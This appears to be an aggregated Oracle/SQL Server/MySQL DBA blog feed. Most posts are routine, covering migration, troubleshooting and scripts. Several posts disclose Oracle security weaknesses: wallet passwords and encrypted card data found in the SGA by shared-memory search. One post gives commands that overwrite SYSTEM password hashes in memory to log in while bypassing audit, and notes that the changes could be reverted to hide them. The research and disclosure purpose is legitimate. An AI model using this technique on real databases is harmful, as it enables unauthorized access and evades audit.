Skip navigation.

DBA Blogs

Oracle DBA Training Options Are Changing

Oracle DBA Training Options Are Changing
Training options for Oracle Database DBAs are changing. Generally, I don't think they are for the better. Companies don't value Oracle Database Administrators like they used to. And, it shows in the lack of their professional development investment.

When I travel a long way from home, I tend to get very reflective about life, death and beyond. On my way home from teaching an onsite two-day Oracle performance tuning seminar coupled with a one-day predictive analysis (forecasting) class in Ghana (yes, Ghana as in AFRICA) I started thinking about how fortunate the Ghana DBAs I taught are. Clearly their management is willing to invest in their DBAs' future. This is very, very rare.

Today most Oracle DBAs receive what I call, "Training By Google." You know, blog posts, YouTube videos and various syntax websites. While these are all valuable (I am a content creator myself with my blog posts and videos), they are no substitute for instructor led training. Not even close! So what is happening that is forcing Oracle DBAs to change their training habits?

So Why The Change? Three Reasons
1. Training Budget. Over the past five years I have been disappointed (more like disturbed) that most companies do not provide the training DBAs need. They just won't do it. IT managers (not typically DBA managers) believe their staff can get by with "Training By Google." It's stupid and foolish. It tells DBAs they are worthless and leaves them unprepared to perform at their best. And, of course, that ends up hurting the company they work for. Stupid and foolish.

Are we then surprised with the results from poor performing systems, down production systems, massive security breaches, and DBAs hopping from one company to another?

2. Travel Budget. A nasty tactic many companies use is to provide a minimal training budget but without a travel budget. If you want specialized and advanced training, you'll probably have to travel to get to it. Maybe not hundreds or thousands of miles, but probably more than you want to commute each day.

Essentially the company is splitting the training cost with the DBA and ensuring the DBA really, really wants the training. OK, I can respect that. But, I think a company that does not truly provide training for its employees (human beings that spend a significant portion of their lives doing whatever it takes to get the job done) is cruel and frankly immoral.

3. More Training Options. The good news for Oracle DBAs is there is more information and training options available today than ever before. When the orapub.com website began in 1995, doing a "tail -f" on the web log was a lesson in world geography. It was amazing watching line after line stream by as DBAs from all over the world were looking for Oracle performance materials through the web. Now there is much more available. Training options for Oracle DBAs now include traditional instructor led training (ILT), web sites from content aggregators (people who pull together content for us), content creators (like myself), and online training. I'm very excited about online training and have made a significant investment in OraPub's Online Institute.

Summary
So there you have it. Because of economics, the devaluation of DBAs as human beings and the increase in training options, the Oracle DBA training landscape is changing. If you believe this, the next question is, "What is good content?" That will be the subject of my next posting!

Enjoy your work and thanks for reading!

Craig.

https://resources.orapub.com/OraPub_Online_Seminars_About_Oracle_Database_Performance_s/100.htm
You can watch seminar introductions (like above) for free on YouTube!
If you enjoy my blog, I suspect you'll get a lot out of my online or in-class training. For details go to www.orapub.com. I also offer on-site training and consulting services.

P.S. If you want me to respond to a comment or you have a question, please feel free to email me directly at craig@orapub .com. Another option is to send an email to OraPub's general email address, which is currently info@ orapub. com.

Categories: DBA Blogs

Presenting at UKOUG Tech14 Conference (Ian Fish, U K Heir)

Richard Foote - Tue, 2014-07-15 01:52
I’ve been lucky enough to present at various conferences, seminars and user group events over the years in some 20 odd countries. But somewhere I’ve never quite managed to present at before is the place of my birth, the UK. Well this year, I’ve decided end my drought and submitted a number of papers for the UKOUG Tech14 Conference and […]
Categories: DBA Blogs

MySQL on-premise to Amazon RDS migration tips

Kubilay Çilkara - Mon, 2014-07-14 13:27
Things to watch and do when migrating MySQL databases from ‘on-premise’ to Amazon AWS RDS
  • Not all versions of databases can be migrated to RDS. Especially if you want to do a 0 downtime migration. Make sure you know which versions are possible, at this writing Amazon announced that it  will support any old version of MySQL 5.1 and above.
  • In a zero downtime migration to Amazon RDS you work with mysqldump or mydumper to  import the baseline data and and then you use MySQL Replication and the binary_log  position to apply the additional records created during the import, the delta.  That is it is possible to create a MySQL slave in the Amazon AWS Clouds!
  • So when you have confirmed the on-premise MySQL that you have is  compatible you can then use mysqldump with the --master-data parameter to export your data including the binlog  position coordinates at the time of  the export. You can use mydumper if yor database is big to do this with parallel streams. You will use the coordinates and MySQL replication to catch-up with the on-premise master database when creating the MySQL slave in RDS.
  • Use different database parameters for different databases.
  • As  you load the RDS database using myloader or  mysql the operation might take long time depending on the size of your database. If this is the case, disable backups, it stops logging, try using one  of the better spec RDS Instance classes and IOPS for the duration of the operation. You can always downsize the RDS instance after you have  completed the initial load.
  • After you have completed the initial load, use Multi AZ which is a synchronous standby (in Oracle parlour) and schedule the backups immediately before you open your applications to the database, as initial backup requires a reboot.
  • Beware there is no SSH access to RDS, that means you have no access to the file system.
  • Get the DB Secuirty groups right and make sure your applications can access the RDS instances
Categories: DBA Blogs

Lock Timeout Error While Creating Database

Pythian Group - Mon, 2014-07-14 08:07

Recently I worked on a issue where a third-party application was failing during the installation. Below was the error returned by the Application.

Lock request time out period exceeded. (Microsoft SQL Server, Error: 1222)

The application was failing while it was trying to create a database. The application seemed to have a default timeout setting which was about 60 seconds after which it was failing, as the command had not yet returned any results.

I tried creating a test database directly from the SQL Server Management Studio and noticed that it was taking long time as well. Once I checked the sys.sysprocesses, I found that the created database was having IO related waits.

Some of the reasons why it might be taking more time while creating the database are

  • IO bottleneck on the drive where we are creating the database files
  • Large size of Model database
  • Instant File Initialization is not enabled

I verified the size of the model database files and found that the model database data file is 5 GB and log file is 1 GB. I have reduced the size of the model database to 1 GB and log file size to 512 MB and then I was able to create the Test database quickly.

Now we started the installation of the Application and it completed successfully as well.

Categories: DBA Blogs

Script to Get the Create Date of an Object from Multiple Databases

Pythian Group - Mon, 2014-07-14 08:04

As a DBA, it is common to get a request to run scripts against production databases. However, there can be environments where there are multiple databases on same instance, where the script needs to be run against. I have seen a environment where there were 50+ databases which have same schema with different data, and each database serving different customers.

When we get a request to run large scripts against many databases, at times with user over sight, it may be possible to miss running the script against one or more databases. The requirement comes to verify if the script was executed against all the databases. One way to verify if the script is executed against all databases is to pick an object (stored procedure, table, view, function) which was created as part of script execution, get the create date of that object and verify if it is showing the date and time when we ran the script. The challenge is to get the create date of a specific object from all databases at a time with little work.

Below is the code which will help in fetching the create date of the specified object (Stored Procedure, Table, View, Function) from all user databases on a instance. Pass the object name @ObjName in the 7th line of the code. Run the code and verify the create date from the output and make sure that the script was executed and created the object during the time the script was run.

-- Script Originally Written By: Keerthi Deep | http://www.SQLServerF1.com/

Set NOCOUNT ON
Declare @ObjName nvarchar(300)
declare @dbn nvarchar(200)

Set @ObjName = 'Object_Name' -- Specify the name of the Stored Procedure/ Table/View/Function

create table #DatabaseList(dbname nvarchar(2000)) 

Insert into #DatabaseList select name from sys.sysdatabases
where name not in ('master', 'msdb', 'model','tempdb')
order by name asc 

--select * from #DatabaseList
Create table #Output_table (DB nvarchar(200), crdate datetime, ObjectName nvarchar(200))
declare c1 cursor for select dbname from #DatabaseList open c1
Fetch next from c1 into @dbn
WHILE @@FETCH_STATUS = 0
BEGIN

declare @Query nvarchar(2048)
Set @Query = 'select ''' + @dbn + ''' as DBName, crdate, [name] from ' + @dbn + '.sys.sysobjects where name = ''' + @ObjName + ''''
--print @Query
Insert into #Output_table Exec sp_executesql @Query

FETCH NEXT FROM c1 into @dbn
END
CLOSE c1
DEALLOCATE c1

select * from #Output_table
Drop table #Output_table
Drop table #DatabaseList

Limitations:
This will work only if the object is created using create command, but will not work if Alter command is used.

Any suggestions are welcome.

Categories: DBA Blogs

Oracle encrypted table data found unencrypted in SGA

ContractOracle - Sun, 2014-07-13 21:29
When data needs to be kept private, or companies are worried about data leakage, then they often choose to store that data in encrypted columns in the table using Oracle Transparent Data Encryption. 

I wanted to see if that data was stored in the SGA in an unencrypted format.  I ran the following test from sqlplus.

CDB$ROOT@ORCL> create table credit_card_number(card_number char(16) encrypt);

Table created.

CDB$ROOT@ORCL> insert into credit_card_number values ('4321432143214321');

1 row created.

CDB$ROOT@ORCL> update credit_card_number set card_number = '5432543254325432' where card_number = '4321432143214321';

1 row updated.

CDB$ROOT@ORCL> VARIABLE cardnumber char(16);
CDB$ROOT@ORCL> EXEC :cardnumber := '6543654365436543';

PL/SQL procedure successfully completed.

CDB$ROOT@ORCL> update credit_card_number set card_number = :cardnumber where card_number = '5432543254325432';

1 row updated.

CDB$ROOT@ORCL> commit;

Now we search SGA for the data that should be encrypted to keep it private.  


[oracle@localhost shared_memory]$ ./sga_search 4321432143214321
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 459100
4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 3244704
4321432143214321
/dev/shm/ora_orcl_38895617_29 found string at 2529984
4321432143214321
[oracle@localhost shared_memory]$ ./sga_search 5432543254325432
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 459061
5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 4106466
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2075064
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2528552
5432543254325432
/dev/shm/ora_orcl_38895617_28 found string at 1549533
5432543254325432
[oracle@localhost shared_memory]$ ./sga_search 6543654365436543
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 6543654365436543
/dev/shm/ora_orcl_38895617_29 found string at 3801400
6543654365436543

The output shows that all 3 of the card_number values used in the demonstration can be found in SGA, sometimes in multiple locations.  Flushing the buffer cache did not clear the data from SGA, but flushing the shared pool did.  Further analysis is needed to confirm exactly where in the shared pool the unencrypted data is being stored to confirm if it is in sql statements, sql variables, or interim values kept by the encryption process.  Further testing is also needed to see if it is possible to avoid potential data leakage by using bind variables or wrapping sql in plsql.  In the meantime ... be aware that data you believe to be encrypted may actually be stored in memory in clear text visible to anyone with privileges to connect to the SGA.

Oracle TDE FAQ  :- http://www.oracle.com/technetwork/database/security/tde-faq-093689.html
States that "With TDE column encryption, encrypted data remains encrypted inside the SGA, but with TDE tablespace encryption, data is already decrypted in the SGA, which provides 100% transparency."
Categories: DBA Blogs

Oracle encryption wallet password found in SGA

ContractOracle - Sun, 2014-07-13 20:51
If companies are worried about data privacy or leakage, they are often recommended to encrypt sensitive data inside Oracle databases to stop DBAs from accessing it, and implement "separation of duties" so that only the application or data owner has the encryption keys or wallet password.  One method to encrypt data is to use Oracle Transparent Database Encryption which stores keys in the Oracle wallet protected by a wallet password.  Best practice dictates using a very long wallet password to avoid rainbow tables and brute force attacks, and keep the key and password secret.

I wrote a simple program to search for data in Oracle shared memory segments, and it was able to find the Oracle wallet password, which means anyone who can connect to the shared memory can get the wallet password and access the encrypted data.  The following demonstrates this :-

First open and close the wallet using the password :-


CDB$ROOT@ORCL> alter system set encryption wallet open identified by "verylongverysecretwalletpassword1";

System altered.

CDB$ROOT@ORCL> alter system set wallet close identified by "verylongverysecretwalletpassword1";

System altered.


Now search for the wallet password in SGA :-
oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1USAGE :- sga_search searchstring

Number of input parameters seem correct.SEARCH FOR   :- verylongverysecretwalletpassword1/dev/shm/ora_orcl_35258369_30 found string at 3473189verylongverysecretwalletpassword1
The search found the password in SGA, so it should be possible to analyse the memory structure that currently stores the known password, and create another program to directly extract passwords on unknown systems.  It may also be possible to find the password by selecting from v$ or x$ tables.  I have not done that analysis, so don't know how difficult it would be, but if the password is stored, it will be possible to extract it, and even if it is mixed up with a lot of other sql text and variables it would be very simple to just try opening the wallet using every string stored in SGA.
The password is still in SGA after flushing the buffer cache.
CDB$ROOT@ORCL> alter system flush buffer_cache;
System altered.

[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1USAGE :- sga_search searchstring

Number of input parameters seem correct.SEARCH FOR   :- verylongverysecretwalletpassword1/dev/shm/ora_orcl_35258369_30 found string at 3473189verylongverysecretwalletpassword1

After flushing the shared pool the password is no longer available.  
CDB$ROOT@ORCL> alter system flush shared_pool;
System altered.

[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1USAGE :- sga_search searchstring

Number of input parameters seem correct.SEARCH FOR   :- verylongverysecretwalletpassword1[oracle@localhost shared_memory]$ 
As this password really should be secret, Oracle really should not store it.   More research is needed to confirm if the password can be hidden by using bind variables, obfuscation, or wrapping it in plsql.
Categories: DBA Blogs

RAC Commands : 1 -- Viewing Configuration

Hemant K Chitale - Sun, 2014-07-13 05:58
In 11gR2

Viewing the configuration of a RAC database

[root@node1 ~]# su - oracle
-sh-3.2$ srvctl config database -d RACDB
Database unique name: RACDB
Database name: RACDB
Oracle home: /u01/app/oracle/rdbms/11.2.0
Oracle user: oracle
Spfile: +DATA1/RACDB/spfileRACDB.ora
Domain:
Start options: open
Stop options: immediate
Database role: PRIMARY
Management policy: AUTOMATIC
Server pools: RACSP
Database instances:
Disk Groups: DATA1,FRA,DATA2
Mount point paths:
Services: MY_RAC_SVC
Type: RAC
Database is policy managed
-sh-3.2$

So, we see that :
a) The database name is RACDB
b) It is a Policy Managed database (not Administrator Managed)
c) It is dependent on 3 ASM Disk Groups DATA1, DATA2, FRA
d) There is one service called MY_RAC_SVC configured
e) The database is in the  RACSP server pool
f) The database is configured to be Auto-started when Grid Infrastructure starts


Viewing the configuration of a RAC service

-sh-3.2$ srvctl config service -d RACDB -s MY_RAC_SVC
Service name: MY_RAC_SVC
Service is enabled
Server pool: RACSP
Cardinality: UNIFORM
Disconnect: false
Service role: PRIMARY
Management policy: AUTOMATIC
DTP transaction: false
AQ HA notifications: false
Failover type: NONE
Failover method: NONE
TAF failover retries: 0
TAF failover delay: 0
Connection Load Balancing Goal: LONG
Runtime Load Balancing Goal: NONE
TAF policy specification: NONE
Edition:
Service is enabled on nodes:
Service is disabled on nodes:
-sh-3.2$

So, we see that :
a) The service name is MY_RAC_SVC
b) The UNIFORM cardinality means that it is to run on all active nodes in the server pool
c) The server-side connection load balancing goal is LONG (for long running sessions)


Viewing the configuration of Server Pools

-sh-3.2$ srvctl config srvpool
Server pool name: Free
Importance: 0, Min: 0, Max: -1
Candidate server names:
Server pool name: Generic
Importance: 0, Min: 0, Max: -1
Candidate server names:
Server pool name: RACSP
Importance: 0, Min: 0, Max: 2
Candidate server names:
-sh-3.2$

So we see that :
a) The RACSP server pool is the only created (named) server pool
b) This server pool has a max of 2 nodes

Categories: DBA Blogs

ORA-09925: Unable to create audit trail file

Oracle in Action - Sat, 2014-07-12 03:33

RSS content

I received this error message when I started my virtual machine and tried to logon to my database as sysdba to startup the instance.
[oracle@node1 ~]$ sqlplus / as sysdba

ERROR:
ORA-09925: Unable to create audit trail file
Linux Error: 30: Read-only file system
Additional information: 9925
ORA-09925: Unable to create audit trail file
Linux Error: 30: Read-only file system
Additional information: 9925

- I rebooted my machine and got following messages which pointed to some errors encountered during filesystem check and instructed to run fsck manually.

[root@node1 ~]# init 6

Checking filesystems

/: UNEXPECTED INCONSISTENCY; RUN fsck MANUALLY.
(i.e., without -a or -p options)
*** An error occurred during the filesystem check.
*** Dropping you to a shell; the system will reboot
*** when you leave the shell.
Give root password for maintenance
(or type Control-D to continue):

– I entered password for root to initiate filesystem check. As a result I was prompted multiple no. of times to allow fixing of  various filesystem errors.

(Repair filesystem) 1 # fsck
Fix(y)?

- After all the errors had been fixed, filesystem check was restarted

Restarting e2fsck from the beginning...

/: ***** FILE SYSTEM WAS MODIFIED *****
/: ***** REBOOT LINUX *****

- After filesystem had been finally checked to be correct, I exited for reboot to continue.

(Repair filesystem) 2 # exit

– After the reboot, I could successfully connect to my database as sysdba .

[oracle@node1 ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.1.0 Production on Sat Jul 12 09:21:52 2014

Copyright (c) 1982, 2009, Oracle. All rights reserved.

Connected to an idle instance.

SQL>

I hope this post was useful.

Your comments and suggestions are always welcome.

—————————————————————————————–

Related Links:

Home

Database Index

 

————-

 



Tags:  

Del.icio.us
Digg

Comments:  0 (Zero), Be the first to leave a reply!You might be interested in this:  
Copyright © ORACLE IN ACTION [ORA-09925: Unable to create audit trail file], All Right Reserved. 2014.

The post ORA-09925: Unable to create audit trail file appeared first on ORACLE IN ACTION.

Categories: DBA Blogs

Finished first pass through Alapati 12c OCP upgrade book

Bobby Durrett's DBA Blog - Fri, 2014-07-11 17:29

I just finished reading Sam Alapati’s 12c OCP upgrade book for the first time and I really like it because of the content that it covered which I hadn’t discovered through my study of the Oracle manuals.  Also, it did a good job explaining some things that Oracle’s manuals left unclear.

After reading each chapter I took the end of chapter test and got between 60% and 75% of the questions right.  Next I plan to take the computer based test that was on the CD that came with the book and which covers both parts of the upgrade exam.

I did find minor errors throughout the book, but I still found it very useful especially after having already studied the same topics on my own without a study guide like this one to direct me.  The author’s insights into the test and the material it covers adds value because they guide me to the areas that I need to focus on.

- Bobby

Categories: DBA Blogs

OTN Latin America Tour, 2014

Hans Forbrich - Fri, 2014-07-11 17:12
The dates, and the speakers, for the Latin America Tour have been anounnced.

http://www.oracle.com/technetwork/es/community/user-groups/otn-latinoamerica-tour-2014-2213115-esa.html


Categories: DBA Blogs

A Ringleader Proxy for Sporadically-Used Web Applications

Pythian Group - Fri, 2014-07-11 08:46

As you might already know, I come up with my fair share of toy web applications.

Once created, I typically throw them on my server for a few weeks but, as the resources of good ol’ Gilgamesh are limited, they eventually have to be turned off to make room for the next wave of shiny new toys. Which is a darn shame, as some of them can be useful from time to time. Sure, running all webapps all the time would be murder for the machine, but there should be a way to only fire up the application when it’s needed.

Of course there’s already a way of doing just that. You might have heard of it: it’s called CGI. And while it’s perfectly possible to run PSGI applications under CGI, it’s also… not quite perfect. The principal problem is that since there is no persistence at all between requests (of course, with the help of mod_perl there could be persistence, but that would defeat the purpose), so it’s not exactly snappy. Although, to be fair, it’d probably be still fast enough for most small applications. But still, it feels clunky. Plus, I’m just plain afraid that if I revert to using CGI, Sawyer will burst out of the wall like a vengeful Kool-Aid Man and throttle the life out of me. He probably wouldn’t, but I prefer not to take any chances.

So I don’t want single executions and I don’t want perpetual running. What I’d really want is something in-between. I’d like the applications to be disabled by default, but if a request comes along, to be awaken and ran for as long as there is traffic. And only once the traffic has abated for a reasonable amount of time do I want the application to be turned off once more.

The good news is that it seems that Apache’s mod_fastcgi can fire dynamic applications upon first request. If that’s the case, then the waking-up part of the job comes for free, and the shutting down is merely a question of periodically monitoring the logs and killing processes when inactivity is detected.

The bad news is that I only heard that after I was already halfway done shaving that yak my own way. So instead of cruelly dropping the poor creature right there and then, abandoning it with a punk-like half-shave, I decided to go all the way and see how a Perl alternative would look.

It’s all about the proxy

My first instinct was to go with Dancer (natch). But a quick survey of the tools available revealed something even more finely tuned to the task at hand: HTTP::Proxy. That module does exactly what it says on the tin: it proxies http requests, and allows you to fiddle with the requests and responses as they fly back and forth.

Since I own my domain, all my applications run on their own sub-domain name. With that setting, it’s quite easy to have all my sub-domains point to the port running that proxy and have the waking-up-if-required and dispatch to the real application done as the request comes in.


use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time = 5;
my $shutdown_delay = 10;

my %services = (
    'foo.babyl.ca' => $foo_config,
    'bar.babyl.ca' => $bar_config,

);

$proxy->push_filter( request => 
    HTTP::Proxy::HeaderFilter::simple->new( sub {

            my( $self, $headers, $request ) = @_;

            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $service->is_running ) {
                $service->start;
                sleep 1;
            }

            # store the latest access time
            $service->store_access_time(time);
    }),
);

$proxy->start;

With this, we already have the core of our application, and only need a few more pieces, and details to iron out.

Enter Sandman

An important one is how to detect if an application is running, and when it goes inactive. For that I went for a simple mechanism. Using CHI to provides me with a persistent and central place to keep information for my application. As soon as an application comes up, I store the time of the current request in its cache, and each time a new request comes in, I update the cache with the new time. That way, the existence of the cache tells me if the application is running, and knowing if the application should go dormant is just a question of seeing if the last access time is old enough.


use CHI;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);

...;

# when checking if the host is running
unless ( $chi->get($host) ) {
    $service->start;
    sleep 1;
}

...;

# and storing the access time becomes
$chi->set( $host => time );

# to check periodically, we fork a sub-process 
# and we simply endlessly sleep, check, then sleep
# some more

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $s = shift;

    my $time = $chi->get($s);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$s}->stop;

    $chi->remove($s);
}

Minding the applications

The final remaining big piece of the puzzle is how to manage the launching and shutting down of the applications. We could do it in a variety of ways, beginning by using plain system calls. Instead, I decided to leverage the service manager Ubic. With the help of Ubic::Service::Plack, setting a PSGI application is as straightforward as one could wish for:


use Ubic::Service::Plack;

Ubic::Service::Plack->new({
    server => "FCGI",
    server_args => { listen => "/tmp/foo_app.sock",
                     nproc  => 5 },
    app      => "/home/web/apps/foo/bin/app.pl",
    port     => 4444,
});

Once the service is defined, it can be started/stopped from the CLI. And, which is more interesting for us, straight from Perl-land:


use Ubic;

my %services = (
    # sub-domain      # ubic service name
    'foo.babyl.ca' => 'webapp.foo',
    'bar.babyl.ca' => 'webapp.bar',
);

$_ = Ubic->service($_) for values %services;

# and then to start a service
$services{'foo.babyl.ca'}->start;

# or to stop it
$services{'foo.babyl.ca'}->stop;

# other goodies can be gleaned too, like the port...
$services{'foo.babyl.ca'}->port;

Now all together

And that’s all we need to get our ringleader going. Putting it all together, and tidying it up a little bit, we get:


use 5.20.0;

use experimental 'postderef';

use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

use Ubic;

use CHI;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time      = 5;
my $shutdown_delay = 10;

my $ubic_directory = '/Users/champoux/ubic';

my %services = (
    'foo.babyl.ca' => 'webapp.foo',
);

$_ = Ubic->service($_) for values %services;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);


$proxy->push_filter( request => HTTP::Proxy::HeaderFilter::simple->new(sub{
            my( $self, $headers, $request ) = @_;
            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $chi->get($host) ) {
                $service->start;
                sleep 1;
            }

            # always store the latest access time
            $chi->set( $host => time );
    }),
);

start_sandman();

$proxy->start;

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $service = shift;

    my $time = $chi->get($service);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$service}->stop;

    $chi->remove($service);
}

It’s not yet completed. The configuration should go in a YAML file, we should have some more safeguards in case the cache and the real state of the application aren’t in sync, and the script itself should be started by Unic too to make everything Circle-of-Life-perfect. Buuuuut as it is, I’d say it’s already a decent start.

Categories: DBA Blogs

Log Buffer #379, A Carnival of the Vanities for DBAs

Pythian Group - Fri, 2014-07-11 07:34

During this summer time in Northern hemisphere, and winter time in Southern hemisphere, the bloggers are solving key problems either by sitting besides the bonfire, or enjoying that bbq. This Log Buffer Edition shares both of these with them.


Oracle:

3 Key Problems To Solve If You Want A Big Data Management System

OpenWorld Update: Content Catalog NOW LIVE!

Interested in Showcasing your Solutions around Oracle Technologies at Oracle OpenWorld?

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

What You Need to Know about OBIEE 11.1.1.7

SQL Server:

Interoperability between Microsoft and SOA Suite 12c

This article describes a way to speed up various file operations performed by SQL Server.

The Mindset of the Enterprise DBA: Creating and Applying Standards to Our Work

Stairway to T-SQL: Beyond The Basics Level 8: Coding Shortcuts using += and -= Operators

Microsoft Azure Diagnostics Part 2: Basic Configuration of Azure Cloud Service Diagnostics

MySQL:

MySQL Enterprise Monitor 2.3.18 has been released

Harnessing the power of master/slave clusters to operate data-driven businesses on MySQL

NoSQL Now! Conference – coming to San Jose, CA this August!

Manually Switch Slaves to new Masters in mySQL 5.6 (XTRADB 5.6)

How to Configure ClusterControl to run on nginx

Categories: DBA Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 03:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated, and the database did not crash, or detect the data change, and allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record, and no evidence in datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back-out the changes made to SGA to the original hash values to cover up completely.
Sample output from the first SGA update command above follows :-
[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC


WARNING WARNING WARNING

This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.

USAGE :- sga_data_replace searchstring replacestring

Number of input parameters seem correct.Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1ECThis program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.SEARCH FOR   :- 09F3A178C7F6F650REPLACE WITH :- E235D5FC5165F1ECEnter Y to continue :- Y/dev/shm/ora_orcl_20381697_76 replace string at 2099160replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_76 replace string at 2271972replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_76 replace string at 2320344replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_75 replace string at 994020replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_68 replace string at 2624228replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_37 replace string at 450614replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_35 replace string at 695886replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with CError: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 02:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.   I have tested it on Linux against Oracle 12C databases, changing data in SGA without crashing the database, but it should also work against 11g.  It won't work against Oracle versions prior to 11g as they manage shared memory in a different manner (Sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

